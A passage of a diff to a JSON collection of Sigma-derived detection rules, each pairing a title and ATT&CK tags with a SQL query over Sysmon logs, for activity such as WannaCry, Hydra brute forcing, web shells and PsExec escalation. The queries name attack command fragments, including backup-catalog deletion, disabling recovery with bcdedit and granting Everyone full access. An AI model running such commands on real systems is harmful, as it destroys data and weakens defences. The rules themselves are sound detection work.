We avoid false positives by excluding all parent process with command line parameters.", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "description": "Detects using SettingSyncHost.exe to run hijacked binary", + "author": "Anton Kutepov, oscd.community", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.execution", + "attack.defense_evasion", + "attack.t1574.008" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentCommandLine LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND ParentCommandLine LIKE '%.exe' ESCAPE '\\') AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%type nul >%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')) AND CommandLine LIKE '%.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) AND (ParentCommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' AND ParentCommandLine LIKE '%RoamDiag.cmd%' ESCAPE '\\' AND ParentCommandLine LIKE '%-outputpath%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_formbook.yml" + "filename": "proc_creation_win_lolbin_settingsynchost.yml" }, { - "title": "HackTool - Inveigh Execution", - "id": 
"b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", - "status": "experimental", - "description": "Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - Hydra Password Bruteforce Execution", + "id": "aaafa146-074c-11eb-adc1-0242ac120002", + "status": "test", + "description": "Detects command line parameters used by Hydra password guessing hack tool", + "author": "Vasiliy Burov", "tags": [ "attack.credential_access", - "attack.t1003.001" + "attack.t1110", + "attack.t1110.001" ], "falsepositives": [ - "Very unlikely" + "Software that uses the caret encased keywords PASS and USER in its command line" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR (OriginalFileName LIKE '\\\\Inveigh.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\Inveigh.dll' ESCAPE '\\') OR Description = 'Inveigh' OR (CommandLine LIKE '% -SpooferIP%' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToIPs %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToDomains %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToMACs %' ESCAPE '\\' OR CommandLine LIKE '% -SnifferIP%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-u %' ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\' AND (CommandLine LIKE '%^USER^%' ESCAPE '\\' OR CommandLine LIKE '%^PASS^%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_inveigh.yml" + "filename": "proc_creation_win_hktl_hydra.yml" }, { - "title": "Suspicious WebDav Client Execution", - "id": "982e9f2d-1a85-4d5b-aea4-31f5e97c6555", + "title": "Suspicious New Service Creation", + "id": "17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8", "status": "experimental", - "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like 
C:\\windows\\system32\\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397\n", - "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1048.003", - "cve.2023.23397" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}') AND NOT (((CommandLine LIKE '%://10.%' ESCAPE '\\' OR CommandLine LIKE '%://192.168.%' ESCAPE '\\' OR CommandLine LIKE '%://172.16.%' ESCAPE '\\' OR CommandLine LIKE '%://172.17.%' ESCAPE '\\' OR CommandLine LIKE '%://172.18.%' ESCAPE '\\' OR CommandLine LIKE '%://172.19.%' ESCAPE '\\' OR CommandLine LIKE '%://172.20.%' ESCAPE '\\' OR CommandLine LIKE '%://172.21.%' ESCAPE '\\' OR CommandLine LIKE '%://172.22.%' ESCAPE '\\' OR CommandLine LIKE '%://172.23.%' ESCAPE '\\' OR CommandLine LIKE '%://172.24.%' ESCAPE '\\' OR CommandLine LIKE '%://172.25.%' ESCAPE '\\' OR CommandLine LIKE '%://172.26.%' ESCAPE '\\' OR CommandLine LIKE '%://172.27.%' ESCAPE '\\' OR CommandLine LIKE '%://172.28.%' ESCAPE '\\' OR CommandLine LIKE '%://172.29.%' ESCAPE '\\' OR CommandLine LIKE '%://172.30.%' ESCAPE '\\' OR CommandLine LIKE '%://172.31.%' ESCAPE '\\' OR CommandLine LIKE '%://127.%' ESCAPE '\\' OR 
CommandLine LIKE '%://169.254.%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%binPath=%' ESCAPE '\\') OR (CommandLine LIKE '%New-Service%' ESCAPE '\\' AND CommandLine LIKE '%-BinaryPathName%' ESCAPE '\\')) AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_webdav_client_susp_execution.yml" + "filename": "proc_creation_win_susp_service_creation.yml" }, { - "title": "Suspicious Windows Update Agent Empty Cmdline", - "id": "52d097e2-063e-4c9c-8fbb-855c8948d135", - "status": "experimental", - "description": "Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags", - "author": "Florian Roth (Nextron Systems)", + "title": "WannaCry Ransomware Activity", + "id": "41d40bff-377a-43e2-8e1b-2e543069e079", + "status": "test", + "description": "Detects WannaCry ransomware activity", + "author": "Florian Roth (Nextron Systems), Tom U. 
@c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro", + "tags": [ + "attack.lateral_movement", + "attack.t1210", + "attack.discovery", + "attack.t1083", + "attack.defense_evasion", + "attack.t1222.001", + "attack.impact", + "attack.t1486", + "attack.t1490" + ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'Wuauclt.exe') AND CommandLine LIKE '%\\\\Wuauclt.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\tasksche.exe' ESCAPE '\\' OR Image LIKE '%\\\\mssecsvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskdl.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhsvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskse.exe' ESCAPE '\\' OR Image LIKE '%\\\\111.exe' ESCAPE '\\' OR Image LIKE '%\\\\lhdfrgui.exe' ESCAPE '\\' OR Image LIKE '%\\\\linuxnew.exe' ESCAPE '\\' OR Image LIKE '%\\\\wannacry.exe' ESCAPE '\\') OR Image LIKE '%WanaDecryptor%' ESCAPE '\\' OR (CommandLine LIKE '%icacls%' ESCAPE '\\' AND CommandLine LIKE '%/grant%' ESCAPE '\\' AND CommandLine LIKE '%Everyone:F%' ESCAPE '\\' AND CommandLine LIKE '%/T%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\') OR (CommandLine LIKE '%bcdedit%' ESCAPE '\\' AND CommandLine LIKE '%/set%' ESCAPE '\\' AND CommandLine LIKE '%{default}%' ESCAPE '\\' AND CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\') OR (CommandLine LIKE '%wbadmin%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%-quiet%' ESCAPE '\\') OR CommandLine LIKE '%@Please\\_Read\\_Me@.txt%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wuauclt_no_cli_flags_execution.yml" + "filename": "proc_creation_win_malware_wannacry.yml" }, 
{ - "title": "HackTool - PPID Spoofing SelectMyParent Tool Execution", - "id": "52ff7941-8211-46f9-84f8-9903efb7077d", - "status": "test", - "description": "Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent", + "title": "Security Privileges Enumeration Via Whoami.EXE", + "id": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b", + "status": "experimental", + "description": "Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1134.004" + "attack.privilege_escalation", + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SelectMyParent.exe' ESCAPE '\\' OR (CommandLine LIKE '%PPID-spoof%' ESCAPE '\\' OR CommandLine LIKE '%ppid\\_spoof%' ESCAPE '\\' OR CommandLine LIKE '%spoof-ppid%' ESCAPE '\\' OR CommandLine LIKE '%spoof\\_ppid%' ESCAPE '\\' OR CommandLine LIKE '%ppidspoof%' ESCAPE '\\' OR CommandLine LIKE '%spoofppid%' ESCAPE '\\' OR CommandLine LIKE '%spoofedppid%' ESCAPE '\\' OR CommandLine LIKE '% -spawnto %' ESCAPE '\\') OR (OriginalFileName LIKE '%PPID-spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%ppid\\_spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof-ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof\\_ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%ppidspoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofedppid%' ESCAPE '\\') OR Description = 'SelectMyParent' OR Imphash IN ('04d974875bd225f00902b4cad9af3fbc', 'a782af154c9e743ddf3f3eb2b8f3d16e', '89059503d7fbf470e68f7e63313da3ad', 'ca28337632625c8281ab8a130b3d6bad') OR (Hashes LIKE '%IMPHASH=04D974875BD225F00902B4CAD9AF3FBC%' 
ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A782AF154C9E743DDF3F3EB2B8F3D16E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89059503D7FBF470E68F7E63313DA3AD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CA28337632625C8281AB8A130B3D6BAD%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /priv%' ESCAPE '\\' OR CommandLine LIKE '% -priv%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_selectmyparent.yml" + "filename": "proc_creation_win_whoami_priv_discovery.yml" }, { - "title": "DNS RCE CVE-2020-1350", - "id": "b5281f31-f9cc-4d0d-95d0-45b91c45b487", + "title": "Shells Spawned by Web Servers", + "id": "8202070f-edeb-4d31-a010-a26c72ac5600", "status": "test", - "description": "Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects web servers that spawn shell processes which could be the result of a successfully placed web shell or another attack", + "author": "Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1569.002" + "attack.persistence", + "attack.t1505.003", + "attack.t1190" ], "falsepositives": [ - "Unknown but benign sub processes of the Windows DNS service dns.exe" + "Particular web applications may spawn a shell process legitimately" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\System32\\\\werfault.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\dnscmd.exe' ESCAPE '\\' 
OR Image LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_TomcatService.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentCommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR ParentCommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\' OR ParentCommandLine LIKE '%catalina.home%' ESCAPE '\\'))) AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\arp.exe' ESCAPE '\\' OR Image LIKE '%\\\\at.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\dsget.exe' ESCAPE '\\' OR Image LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR Image LIKE '%\\\\find.exe' ESCAPE '\\' OR Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\hostname.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\netdom.exe' ESCAPE '\\' OR Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntdutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\pathping.exe' ESCAPE '\\' OR Image LIKE '%\\\\ping.exe' ESCAPE '\\' OR Image LIKE '%\\\\qprocess.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\' OR Image LIKE '%\\\\qwinsta.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\tasklist.exe' ESCAPE '\\' OR Image LIKE '%\\\\tracert.exe' ESCAPE '\\' OR Image LIKE '%\\\\ver.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wusa.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%Windows\\\\system32\\\\cmd.exe /c C:\\\\ManageEngine\\\\ADManager \"Plus\\\\ES\\\\bin\\\\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt' ESCAPE '\\') OR (CommandLine LIKE '%sc query%' ESCAPE '\\' AND CommandLine LIKE '%ADManager Plus%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2020_1350.yml" + "filename": "proc_creation_win_webshell_spawn.yml" }, { - "title": "Renamed Jusched.EXE Execution", - "id": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", - "status": "test", - "description": "Detects the execution of a renamed \"jusched.exe\" as seen used by the cobalt group", - "author": "Markus Neis, Swisscom", + "title": "Suspicious Parent Double Extension File Execution", + "id": "5e6a80c8-2d45-4633-9ef4-fa2671a39c5c", + "status": "experimental", + "description": "Detect execution of suspicious 
double extension files in ParentCommandLine", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1036.003" + "attack.t1036.007" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Description IN ('Java Update Scheduler', 'Java(TM) Update Scheduler') AND NOT (Image LIKE '%\\\\jusched.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%.doc.lnk' ESCAPE '\\' OR ParentImage LIKE '%.docx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.xls.lnk' ESCAPE '\\' OR ParentImage LIKE '%.xlsx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.ppt.lnk' ESCAPE '\\' OR ParentImage LIKE '%.pptx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.rtf.lnk' ESCAPE '\\' OR ParentImage LIKE '%.pdf.lnk' ESCAPE '\\' OR ParentImage LIKE '%.txt.lnk' ESCAPE '\\' OR ParentImage LIKE '%.doc.js' ESCAPE '\\' OR ParentImage LIKE '%.docx.js' ESCAPE '\\' OR ParentImage LIKE '%.xls.js' ESCAPE '\\' OR ParentImage LIKE '%.xlsx.js' ESCAPE '\\' OR ParentImage LIKE '%.ppt.js' ESCAPE '\\' OR ParentImage LIKE '%.pptx.js' ESCAPE '\\' OR ParentImage LIKE '%.rtf.js' ESCAPE '\\' OR ParentImage LIKE '%.pdf.js' ESCAPE '\\' OR ParentImage LIKE '%.txt.js' ESCAPE '\\') OR (ParentCommandLine LIKE '%.doc.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.doc.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.js%' 
ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.js%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_jusched.yml" + "filename": "proc_creation_win_susp_double_extension_parent.yml" }, { - "title": "Filter Driver Unloaded Via Fltmc.EXE", - "id": "4931188c-178e-4ee7-a348-39e8a7a56821", - "status": "test", - "description": "Detect filter driver unloading activity via fltmc.exe", - "author": "Nasreddine Bencherchali", + "title": "Potential Privilege Escalation To LOCAL SYSTEM", + "id": "207b0396-3689-42d9-8399-4222658efc99", + "status": "experimental", + "description": "Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1562", - "attack.t1562.002" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Unknown" + "Weird admins that rename their tools", + "Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND CommandLine LIKE '%unload%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%unload rtp\\_filesystem\\_filter' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s 
/i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%PsExec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_fltmc_unload_driver.yml" + "filename": "proc_creation_win_sysinternals_susp_psexec_paexec_flags_.yml" }, { - "title": "WhoAmI as Parameter", - "id": "e9142d84-fbe0-401d-ac50-3e519fb00c89", + "title": "Renamed Jusched.EXE Execution", + "id": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", "status": "test", - "description": "Detects a suspicious process command line that uses whoami as first parameter (as e.g. 
used by EfsPotato)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of a renamed \"jusched.exe\" as seen used by the cobalt group", + "author": "Markus Neis, Swisscom", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.execution", + "attack.defense_evasion", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%.exe whoami%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Description IN ('Java Update Scheduler', 'Java(TM) Update Scheduler') AND NOT (Image LIKE '%\\\\jusched.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_whoami_as_param.yml" + "filename": "proc_creation_win_renamed_jusched.yml" }, { - "title": "Potential Credential Dumping Via WER", - "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3", - "status": "experimental", - "description": "Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass", - "author": "@pbssubhash , Nasreddine Bencherchali", + "title": "SystemStateBackup Deleted Using Wbadmin.EXE", + "id": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", + "status": "test", + "description": "Deletes the Windows systemstatebackup using wbadmin.exe.\nThis technique is used by numerous ransomware families.\nThis may only be successful on server platforms that have Windows Backup enabled.\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the \"-p\" parameter in the CommandLine." 
